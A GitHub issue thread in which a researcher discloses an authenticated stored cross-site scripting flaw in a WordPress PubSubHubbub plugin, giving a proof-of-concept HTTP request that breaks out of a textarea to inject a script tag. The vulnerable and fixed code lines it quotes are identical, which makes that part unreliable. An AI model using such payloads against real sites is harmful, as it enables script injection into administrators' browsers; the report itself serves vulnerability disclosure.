search

pubsubhubbub / wordpress-pubsubhubbub

WebSub/PubSubHubbub for WordPress
https://wordpress.org/plugins/pubsubhubbub/
MIT License
64 stars 11 forks source link

[ Security Issue ] Authenticated stored cross-site scripting #18

Closed osamahamad closed 10 months ago

osamahamad commented 2 years ago

I found that your plugin is vulnerable to stored cross-site scripting during my security research on wordpress plugins that have more than 200,000+ active installations.

I wish there are a security policy for this plugin to report it. I didn't find another way. Note this is affecting the last version 3.1.2, didn't check if the others are vulnerable or not. as can be seen in templates\settings-page.php

$pubsubhubbub_endpoints = esc_html(trim( implode( PHP_EOL, pubsubhubbub_get_hubs() ), PHP_EOL ));

<textarea name="pubsubhubbub_endpoints" id="pubsubhubbub_endpoints" rows="10" cols="50" class="large-text"><?php echo $pubsubhubbub_endpoints; ?></textarea>

pubsubhubbub_endpoints will print output unsanitized from dangerous HTML chars [ < > }. Therefore, a malicious actor can escape </textarea> and inject malicious javascript code on the client-side.

Proof of Concept

POST /wordpress/wp-admin/options.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/wordpress/wp-admin/options-general.php?page=pubsubhubbub
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
Origin: http://target.com
Connection: close
Cookie: wordpress_799b52315717366fca2f113600
Upgrade-Insecure-Requests: 1

option_page=pubsubhubbub&action=update&_wpnonce=0db7dd530d&_wp_http_referer=%2Fwpmf%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpubsubhubbub%26settings-updated%3Dtrue&pubsubhubbub_endpoints=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Save+Changes

Redemption

Simply escape the chars with esc_html() or something similar.

templates\settings-page.php

$pubsubhubbub_endpoints = esc_html(trim( implode( PHP_EOL, pubsubhubbub_get_hubs() ), PHP_EOL ));

That will result in

image

yogeshbeniwal commented 2 years ago

@osamahamad Administrator privilege is required to perform this?